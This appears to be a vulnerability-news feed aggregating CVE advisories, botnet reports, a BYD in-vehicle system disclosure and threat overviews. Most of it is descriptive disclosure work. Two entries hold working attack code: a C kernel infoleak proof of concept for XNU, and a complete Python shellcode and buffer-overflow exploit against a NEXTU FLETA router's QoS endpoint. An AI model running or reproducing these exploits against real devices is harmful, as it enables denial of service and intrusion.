Most recent activity.

A triple-exploit chain. auth bypass (1) to exposed dbus interface (2) to command injection (3) (from @da_667@infosec.exchange)

2025-03-28T09:32:38.396147+00:00

A triple-exploit chain. auth bypass (1) to exposed dbus interface (2) to command injection (3): https://www.exploit-db.com/exploits/45100

CMSimple 5.16 vulnerabilities leading to RCE

2025-03-28T09:32:38.396130+00:00

#### Vulnerabilities in CMSimple 5.16 leading to RCE * CVE-2024-57546 - An issue in CMSimple v.5.16 allows a remote attacker to obtain sensitive information via a crafted script to the validate link function. * CVE-2024-57547 - Insecure Permissions vulnerability in CMSimple v.5.16 allows a remote attacker to obtain sensitive information via a crafted script to the Functionality of downloading php backup files. * CVE-2024-57548 - CMSimple 5.16 allows the user to edit log.php file via print page. * CVE-2024-57549 - CMSimple 5.16 allows the user to read cms source code through manipulation of the file name in the file parameter of a GET request. #### Original research [https://github.com/h4ckr4v3n/cmsimple5.16_research](https://github.com/h4ckr4v3n/cmsimple5.16_research)

Command injection and insecure default credentials vulnerabilities in certain legacy DSL CPE from Zyxel

2025-03-28T09:32:38.396114+00:00

## Summary Zyxel recently became aware of CVE-2024-40890 and CVE-2024-40891 being mentioned in a post on GreyNoise’s blog. Additionally, VulnCheck informed us that they will publish the technical details regarding CVE-2024-40891 and CVE-2025-0890 on their blog. We have confirmed that the affected models reported by VulnCheck, VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, are legacy products that have reached end-of-life (EOL) for years. Therefore, we strongly recommend that users replace them with newer-generation products for optimal protection. What are the vulnerabilities? ### CVE-2024-40890 **UNSUPPORTED WHEN ASSIGNED** A post-authentication command injection vulnerability in the CGI program of certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, could allow an authenticated attacker to execute operating system (OS) commands on an affected device by sending a crafted HTTP POST request. It is important to note that WAN access is disabled by default on these devices, and this attack can only be successful if user-configured passwords have been compromised. ### CVE-2024-40891 **UNSUPPORTED WHEN ASSIGNED** A post-authentication command injection vulnerability in the management commands of certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500. This vulnerability could allow an authenticated attacker to execute OS commands on an affected device via Telnet. It is important to note that WAN access and the Telnet function are disabled by default on these devices, and this attack can only be successful if the user-configured passwords have been compromised. ### CVE-2025-0890 **UNSUPPORTED WHEN ASSIGNED** Insecure default credentials for the Telnet function in certain legacy DSL CPE models, including VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500, could allow an attacker to log in to the management interface if the administrators have the option to change the default credentials but fail to do so. It is important to note that WAN access and the Telnet function are disabled by default on these devices. What should you do? The following models—VMG1312-B10A, VMG1312-B10B, VMG1312-B10E, VMG3312-B10A, VMG3313-B10A, VMG3926-B10B, VMG4325-B10A, VMG4380-B10A, VMG8324-B10A, VMG8924-B10A, SBG3300, and SBG3500—are legacy products that have reached EOL status for several years. In accordance with industry product life cycle management practices, Zyxel advises customers to replace these legacy products with newer-generation equipment for optimal protection. If you obtained your Zyxel product through an internet service provider (ISP), please contact the ISP for support. For ISPs, please contact your Zyxel sales or service representatives for further details. Additionally, disabling remote access and periodically changing passwords are proactive measures that can help prevent potential attacks. Coordinated Timeline: * 2024-07-13: VulnCheck notified Zyxel about vulnerabilities in the EOL CPE VMG4325-B10A without providing any reports. * 2024-07-14: Zyxel requested VulnCheck to provide a detailed report; however, VulnCheck did not respond. * 2024-07-31: VulnCheck published CVE-2024-40890 and CVE-2024-40891 on their blog without informing Zyxel. * 2025-01-28: GreyNoise published CVE-2024-40890 and CVE-2024-40891 on their blog. * 2025-01-29: Zyxel received VulnCheck’s report regarding CVE-2024-40890, CVE-2024-40891, and CVE-2025-0890. * 2025-01-29: Zyxel became aware of the vulnerabilities in certain legacy DSL CPE models.

Unauthenticated RCE on Some Netgear WiFi Routers, PSV-2023-0039

2025-03-28T09:32:38.396098+00:00

NETGEAR has released fixes for an unauthenticated RCE security vulnerability on the following product models: * XR1000 fixed in firmware version 1.0.0.74 * XR1000v2 fixed in firmware version 1.1.0.22 * XR500 fixed in firmware version 2.3.2.134 NETGEAR strongly recommends that you download the latest firmware as soon as possible.

disabling cert checks: "we have not learned much" from @bagder@mastodon.social

2025-03-28T09:32:38.396082+00:00

The article "Disabling cert checks: we have not learned much" by Daniel Stenberg, published on February 11, 2025, discusses the persistent issue of developers disabling SSL/TLS certificate verification in applications, despite the security risks involved. Stenberg reflects on the history of SSL/TLS usage, emphasizing that since 2002, curl has verified server certificates by default to prevent man-in-the-middle attacks. He highlights common challenges that lead developers to disable certificate verification, such as development environment mismatches, outdated CA stores, or expired certificates. Despite efforts to educate and design APIs that encourage secure practices, the problem persists, indicating a need for continued emphasis on the importance of proper certificate verification in software development. A quick CVE search immediately reveals security vulnerabilities for exactly this problem published only last year: * CVE-2024-32928 – The libcurl CURLOPT_SSL_VERIFYPEER option was disabled on a subset of requests made by Nest production devices. * CVE-2024-56521 – An issue was discovered in TCPDF before 6.8.0. If libcurl is used, CURLOPT_SSL_VERIFYHOST and CURLOPT_SSL_VERIFYPEER are set unsafely. * CVE-2024-5261 – In affected versions of Collabora Online, in LibreOfficeKit, curl’s TLS certificate verification was disabled (CURLOPT_SSL_VERIFYPEER of false).

A Mirai botnet is attempting exploitation in the wild using a new (at least to us) set of CVEs

2025-03-28T09:32:38.396067+00:00

A Mirai botnet is attempting exploitation in the wild using a new set of CVEs, focusing mostly on IoT devices. Includes: - Tenda CVE-2024-41473 - Draytek CVE-2024-12987 - HuangDou UTCMS V9 CVE-2024-9916 - Totolink CVE-2024-2353 CVE-2024-24328 CVE-2024-24329 - (likely) Four-Faith CVE-2024-9644 Source: The Shadowserver Foundation

Potential privilege escalation in IDPKI (CVE-2024-39327, CVE-2024-39328, CVE-2024-51505)

2025-03-28T09:32:38.396051+00:00

A security assessment of IDPKI implementation revealed a weakness potentially allowing an operator to exceed its privileges. In the course of a pentest security assessment of IDPKI, some security measures protecting internal communications were found potentially compromised for an internal user with high privileges. None of these vulnerabilities put Certificate Authority (CA) private key at risk. Eviden analyzed the root cause of the weakness. It revealed two separate vulnerabilities. During validation of the fix, an additional vulnerability of similar nature was identified, leveraging some race condition to alter an internal automata state and achieve a system privilege escalation: * CVE-2024-39327: The vulnerability could allow the possibility to obtain CA signing in an illegitimate way. * CVE-2024-39328: Highly trusted role (Config Admin) could exceed their configuration privileges in a multi-partition environment and access some confidential data. Data integrity and availability is not at risk. * CVE-2024-51505: Highly trusted role (Config Admin) could leverage a race condition to escalate privileges. * CVE-2024-39327 correction has been validated and published. * CVE-2024-39328 correction has been validated and published. This vulnerability has no impact in mono-partition nor in SaaS environments. * CVE-2024-51505 risk is increased if the last fixes are not applied, as a lower privileged role is required. A fix is available and published.

Black Basta’s Leaked Chat Logs

2025-03-28T09:32:38.396034+00:00

Leaked ransomware chat logs reveal Black Basta’s targeted CVEs. On February 11, 2025, a major leak exposed BLACKBASTA's internal Matrix chat logs. The leaker claimed they released the data because the group was targeting Russian banks. This leak closely resembles the previous Conti leaks. Cybercrime group focused on Microsoft vulnerabilities as well as flaws in network edge devices and communications software. We have sightings from MISP and The Shadowserver fundation related to the rejected CVE: * CVE-2024-21683 * ghsa-vr88-2hv2-5jvf

Cyber Threat Overview 2024 from CERT-FR

2025-03-28T09:32:38.396014+00:00

> In this fourth edition of the Cyber Threat Overview, The French Cybersecurity Agency (ANSSI) addresses prevalent cybersecurity threats and the pivotal incidents which occurred in 2024. In line with the previous years, ANSSI estimates that attackers associated with the cybercriminal ecosystem and reputedly linked to China and Russia are three of the main threats facing both critical information systems and the national ecosystem as a whole. > > This past year was also marked by the hosting of the Paris Olympic and Paralympic Games and by the number and the impact of vulnerabilities affecting information systems’ security edge devices. | CVE | SCORE CVSS3.x | ÉDITEUR | RISQUE | RÉFÉRENCE CERT-FR | |-----------------|--------------|--------------|------------------------------------------------------|--------------------------------------------| | CVE-2024-21887 | 9.1 | IVANTI | Remote execution of arbitrary code, security policy and authentication bypass, access to restricted resources on different security and VPN gateways | CERTFR-2024-ALE-001, CERTFR-2024-AVI-0109, CERTFR-2024-AVI-0085 | | CVE-2023-46805 | 8.2 | IVANTI | Remote execution of arbitrary code, security policy and authentication bypass on different security and VPN gateways | CERTFR-2024-ALE-0097 | | CVE-2024-21893 | 8.2 |IVANTI | | | | CVE-2024-3400 | 10.0 | PALO ALTO NETWORKS | Remote execution of arbitrary code on different security devices | CERTFR-2024-ALE-006, CERTFR-2024-AVI-0307 | | CVE-2022-42475 | 9.8 | FORTINET | Remote execution of arbitrary code on different SSL VPN gateways | CERTFR-2022-ALE-012, CERTFR-2022-AVI-1090 | | CVE-2024-8963 | 9.4 | IVANTI | Remote execution of arbitrary code and security policy bypass on different security and VPN gateways | CERTFR-2024-ALE-013, CERTFR-2024-AVI-0796, CERTFR-2024-AVI-0917 | | CVE-2024-8190 | 7.2 | IVANTI | | CERTFR-2024-ALE-014, CERTFR-2024-AVI-0917 | | CVE-2024-47575 | 9.8 | FORTINET | Remote execution of arbitrary code on different security devices | CERTFR-2024-ALE-014, CERTFR-2024-AVI-0917 | | CVE-2024-21762 | 9.8 | FORTINET | Remote execution of arbitrary code on different security devices | CERTFR-2024-ALE-004, CERTFR-2024-AVI-0108 | | CVE-2021-44228 | 10.0 | APACHE | Remote execution of arbitrary code | CERTFR-2021-ALE-022 | | CVE-2024-24919 | 8.6 | CHECK POINT | Breach of data confidentiality | CERTFR-2024-ALE-008, CERTFR-2024-AVI-0449 |

Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0

2025-03-28T09:32:38.395970+00:00

Critical authentication bypass vulnerabilities (CVE-2025-25291 + CVE-2025-25292) were discovered in ruby-saml up to version 1.17.0. More information: https://github.blog/security/sign-in-as-anyone-bypassing-saml-sso-authentication-with-parser-differentials/

A particularly 'sus' sysctl in the XNU Kernel

2025-03-28T09:32:38.393739+00:00

### Timeline * September 16, 2024: macOS 15.0 Sequoia was released with xnu-11215.1.10, the first public kernel release with this bug. * Fall 2024: I reported this bug to Apple. * December 11, 2024: macOS 15.2 and iOS 18.2 were released, fixing this bug, and assigning CVE-2024-54507 to this issue.

Proof Of Concept

2025-03-28T09:32:38.393724+00:00

```c // ravi (@0xjprx) // 2-byte kernel infoleak, introduced in xnu-11215.1.10. // gcc SUSCTL.c -o susctl // ./susctl #include #include void leak() { uint64_t val = 0; size_t len = sizeof(val); sysctlbyname("net.inet.udp.log.remote_port_excluded", &val, &len, NULL, 0); printf("leaked: 0x%llX 0x%llX\n", (val >> 16) & 0x0FF, (val >> 24) & 0x0FF); } int main() { leak(); return 0; } ``` from https://github.com/jprx/CVE-2024-54507

Yealink informs that the SIP-T46S has been discontinued since 2022-03-31

2025-03-28T09:32:38.393708+00:00

""" Dear Customers, Yealink hereby informs you that the SIP-T46S has been discontinued since 2022-03-31. After the date, new orders for the product would not be accepted. After the End-of-Life date, Yealink will not pursue any new feature development on SIP-T46S, but we will follow the industry standard practices regarding software support of the discontinued (EOL) products. Consistent with such standards, Yealink will continue to offer support and after-sale service. The general policy guidelines are: (1) For the first year from the End of Life date, Yealink will offer full support, including HW/SW Technical Support, Apply Existing SW Bug Fixes, New Non-Critical SW Bug Fixes, New Critical SW Bug Fixes and New Security Fixes. (2) For the second year till, and including, the fifth year from the End of Life, Yealink will attempt to provide SW bug fixes. In the EOL support phase, a SW upgrade of the product to a newer existing release will also be seen as a fix to the SW bug. Providing a fix may not be possible in some cases due to the limitation of hardware or software architecture, and Yealink in its sole discretion will determine what fixes, if any, will be provided. (3) Yealink will not offer any New Features/Enhancements support from the End of Life. (4) Spares or replacement parts for hardware will be available depending on your local distributors. Please contact your local Yealink distributors for HW Technical Support and HW Repair and Return (subject to inventory availability). The local Yealink distributors will provide you the corresponding HW support in accordance with Yealink Return Materials Authorization (RMA) process. (5) Since the sixth year from the End of Life, Yealink will not offer any Support. """

A vulnerability report for BYD (Chinese car maker)

2025-03-28T09:32:38.393693+00:00

# Vulnerability Report - BYD QIN PLUS DM-i - Dilink OS - Incorrect Access Control **Product:** BYD QIN PLUS DM-i - Dilink OS **Vendor**: https://www.byd.com/ **Version**: 3.0_13.1.7.2204050.1. **Vulnerability Type:** Incorrect Access Control **Attack Vectors**: The user installs and runs an app on the IVI system that only requires normal permissions. ## Introduction The BYD QIN PLUS DM-i with Dilink OS contains an Incorrect Access Control vulnerability. Attackers can bypass permission restrictions and obtain confidential vehicle data through **Attack Path 1**: **System Log Theft** and **Attack Path 2**: **CAN Traffic Hijacking**. ## Attack Path 1 : System Log Theft Incorrect access control in BYD QIN PLUS DM-i Dilink OS 3.0_13.1.7.2204050.1 allows unaithorized attackers to access system logcat logs. ### Description The DiLink 3.0 system’s /system/bin/app_process64 process logs system logcat data, storing it in zip files in the /sdcard/logs folder. These logs are accessible by regular apps, allowing them to bypass restrictions, escalate privileges, and potentially copy and upload sensitive vehicle data (e.g., location, fuel/energy consumption, VIN, mileage) to an attacker’s server. This poses a serious security risk, as the data is highly confidential for both users and manufacturers. ### Detailed Steps 1. Check the system-collected and stored system logs. ![log.png](https://s2.loli.net/2025/01/26/MRTCqKnv1aEIpQZ.png) 2. The malicious app copies system files to its own private directory. The main code is as follows: 3. The malicious app successfully steals system logs to its private directory. ![.png](https://s2.loli.net/2025/01/26/r7vsY93LgTb6coF.png) 4. Extract the file and search for sensitive confidential information in the system logs. (a) Fuel consumption, energy consumption, and seatbelt status. ![111.png](https://s2.loli.net/2025/01/26/6jkmACTRwxaX7sb.png) (b) ICCID, VIN (Vehicle Identification Number), and model code. ![vin.png](https://s2.loli.net/2025/01/26/nJWl3fq5QKVNuEx.png) (c) Diagnostic command format. ![.png](https://s2.loli.net/2025/01/26/jc3xCTkUd8a4ZF2.png) (d) Various detailed vehicle status information. ![.png](https://s2.loli.net/2025/01/26/lSTFK7thceQJ16b.png) ### **Ethical Considerations** The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in in the latest versions, with the logs now encrypted. ### Additional Notes Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe. ### Disclaimer This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided. ## Attack Path 2 : CAN Traffic Hijacking The attacker can remotely intercept the vehicle's CAN traffic, which is supposed to be sent to the manufacturer's cloud server, and potentially use this data to infer the vehicle's status. ### Description In the DiLink 3.0 system, the /system/priv-app/CanDataCollect folder is accessible to regular users, allowing them to extract CanDataCollect.apk and analyze its code. The "com.byd.data_collection_notify" broadcast, not protected by the system, lets apps set the CAN traffic upload URL. This enables attackers to: 1. Set the upload URL to null, preventing cloud data collection. 2. Set the upload URL to an attacker’s domain for remote CAN traffic collection. Additionally, the encoded upload files can be decrypted using reverse-engineered decoding functions, enabling attackers to remotely analyze CAN traffic and infer the vehicle's status. ### Detailed Steps 1. The vulnerability code for the broadcast handling in CanDataCollect.apk. 2. The exploitation code for the malicious app vulnerability. 3. The malicious app successfully modifies the uploaded CAN traffic URL. ![.png](https://s2.loli.net/2025/01/26/sugvP14iSFrAhHW.png) 4. After the attack on the IVI system, the logcat logs route CAN traffic to the attacker’s server. 5. The CAN traffic collected by the attacker and the decoded results. ### **Ethical Considerations** The vulnerability has been reported to the manufacturer and confirmed. It has been addressed and fixed in the latest versions. ### Additional Notes: Our vulnerability discovery was conducted on a standalone in-vehicle system, and due to the absence of a real vehicle, the logs collected by the system were quite limited. In a real vehicle, we expect to collect a much richer and larger volume of logs. Due to device limitations, we were unable to conduct further verification. Additionally, only one version of the in-vehicle system was tested, but other versions may also contain the same vulnerability, with the actual impact potentially being more severe. ### Disclaimer This vulnerability report is intended solely for informational purposes and must not be used for malicious activities. The author disclaims any responsibility for the misuse of the information provided.

NEXTU FLETA Wifi6 Router DOS, Potential RCE POC

2025-03-28T09:32:38.393678+00:00

```python from pwn import * from hackebds import * def shutdown_shell_code(): context.update(arch='mips', os='linux', bits=32, endian='little') cmd = "/bin/sh" args = ["autoreboot"] asmcode = shellcraft.mips.linux.execve(cmd, args, 0) + shellcraft.mips.linux.exit() shellcode = asm(asmcode) return shellcode power_off_code = shutdown_shell_code() gap_code = (b'A') * 0x138 # This is the area that overwrites the RET region. You can place the address to which you want to redirect the execution flow. # For example I fixed address as 0x7f854710 RET_address = (b'\x10\x47\x85\x7f') stack_gap = (b'C') * 0x40 print("power_off_code_length") print(len(power_off_code)) final_code = power_off_code + gap_code + RET_address + stack_gap import socket import ssl # Server Address and Port HOST = '192.168.1.254' PORT = 443 # Create an SSL socket for HTTPS connection context = ssl.create_default_context() context.set_ciphers('HIGH:!DH:!aNULL') context.check_hostname = False context.verify_mode = ssl.CERT_NONE with socket.create_connection((HOST, PORT)) as sock: with context.wrap_socket(sock, server_hostname=HOST) as ssock: # Prepare the shellcode as bytes (e.g., b'\x00\x01\x02'; replace with appropriate values for actual use) # parameter for evade verification send_byte = b"enabled=ON&automaticUplinkSpeed=ON&automaticDownlinkSpeed=ON&addressType=0&ipversion=0&protocol=0&ipStart=192.168.1.5&ipEnd=192.168.1.5&localPortStart=1234&localPortEnd=1234&rmt_ipStart=&rmt_ipEnd=&rmt_portStart=&rmt_portEnd=&l7_protocol=Disable&mode=1&bandwidth=200&bandwidth_downlink=200&remark_dscp=&save_apply=%EC%A0%80%EC%9E%A5+%ED%9B%84+%EC%A0%81%EC%9A%A9&addQosFlag=1&lan_mask=255.255.255.0&submit-url=%2Fip_qos.htm&entry_name=" + final_code # POST request headers headers = b"POST /boafrm/formIpQoS HTTP/1.1\r\n" \ b"Host: " + HOST.encode('utf-8') + b"\r\n" \ b"Content-Type: application/octet-stream\r\n" \ b"Content-Length: " + str(len(send_byte)).encode( 'utf-8') + b"\r\nConnection: close\r\n\r\n" # Send request (combine headers and body) ssock.send(headers + send_byte) # Receive response response = b"" while True: data = ssock.recv(1024) if not data: break response += data #Print response print(response.decode('utf-8')) ```

SonicWall Firewall Vulnerability Exploited After PoC Publication

2025-03-28T09:32:38.393663+00:00

Threat actors started exploiting a recent SonicWall firewall vulnerability this week, shortly after proof-of-concept (PoC) code targeting it was published. According to Bishop Fox, approximately 4,500 internet-facing SonicWall SSL VPN servers had not been patched against CVE-2024-53704 by February 7.

Palantir - Security Bulletin - CVE-2024-49581 - Palantir’s External Artifacts service (versions 105.110.1 through 105.115.0)

2025-03-28T09:32:38.393647+00:00

Restricted Views backed objects (OSV1) could be bypassed under specific circumstances due to a software bug, this could have allowed users that didn't have permission to see such objects to view them via Object Explorer directly. The affected service have been patched and automatically deployed to all Apollo-managed Foundry instances.

Formal Vulnerability Disclosure for iPhone 15 Pro Max (iOS 18.3.1)

2025-03-28T09:32:38.393630+00:00

### Executive Summary This report updates the findings on CVE-2025-24085, a use-after-free vulnerability affecting Apple's IDS subsystem and iMessage's BlastDoor sandboxing. Findings (As of February 20, 2025) iOS 18.3.1 remains vulnerable despite Apple's February 19, 2025, mitigation deadline. BlastDoor is bypassed, enabling unsandboxed iMessage processing. Privilege escalation attempts detected, suggesting a possible kernel exploit. Unauthorized decryption and authentication tampering observed, raising concerns about iMessage interception and data exposure. The exploit remains active in the wild, requiring immediate action. https://github.com/orgs/community/discussions/152523

PolarEdge Botnet Exploits Cisco and Other Flaws to Hijack ASUS, QNAP, and Synology Devices

2025-03-28T09:32:38.393608+00:00

French cybersecurity company Sekoia observed the unknown threat actors deploying a backdoor by leveraging CVE-2023-20118 (CVSS score: 6.5), a critical security flaw impacting Cisco Small Business RV016, RV042, RV042G, RV082, RV320, and RV325 Routers that could result in arbitrary command execution on susceptible devices. CVE-2023-20118 is leading to a webshell installation.

Apple fixes WebKit zero-day exploited in ‘extremely sophisticated’ attacks

2025-03-28T09:32:38.393508+00:00

Apple has released emergency security updates to patch a zero-day bug the company describes as exploited in "extremely sophisticated" attacks. The vulnerability is tracked as CVE-2025-24201 and was found in the WebKit cross-platform web browser engine used by Apple's Safari web browser and many other apps and web browsers on macOS, iOS, Linux, and Windows.